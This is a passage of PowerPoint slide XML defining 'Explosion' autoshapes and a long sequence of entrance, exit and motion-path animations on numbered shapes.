            <a:ext cx="719138"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7" name="Explosion 2 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4019550"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8" name="Explosion 2 50"/>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9" name="Explosion 2 51"/>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0" name="Explosion 2 52"/>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1"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05"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25605"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25604"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25604"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25609"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25609"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25612"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25612"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25610"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25610"/>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25613"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25613"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25614"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25614"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="27" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25615"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25615"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="30" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25616"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2561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5603"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25603"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="37" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25606"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25606"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="40" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25607"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25607"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="43" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25608"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25608"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">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5617"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25617"/>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5618"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25618"/>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5619"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25619"/>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5620"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25620"/>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5621"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25621"/>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5622"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25622"/>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5611"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="256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623"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="256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p:cBhvr>
                                        <p:cTn id="76" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25623"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25623"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="78" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25646"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25646"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="81" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="82" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.44444E-6 4.44444E-6 L 0.2757 -0.09445 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25646"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="1380000" y="-470000"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="84" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="85" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25647"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25647"/>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5648"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25648"/>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5649"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25649"/>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650"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="96" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25650"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="97" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="98" presetID="64" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.11111E-6 -1.11111E-6 L -0.00781 -0.23102 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="99" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25647"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-40000" y="-1160000"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="100" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -2.5E-6 -1.48148E-6 L -0.07083 0.11528 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="101" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25649"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="102" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.11111E-6 0.00023 L 0.15746 0.11551 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25648"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="104" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.11111E-6 0.00023 L 0.36215 0.08403 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25650"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="106" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="107" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25624"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25624"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="110" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="111" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="112" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25624"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="113" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25624"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="114" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="115" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="116" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25651"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="117" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25651"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="118" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="119" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25647"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="120" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25647"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="121" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="122" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25648"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
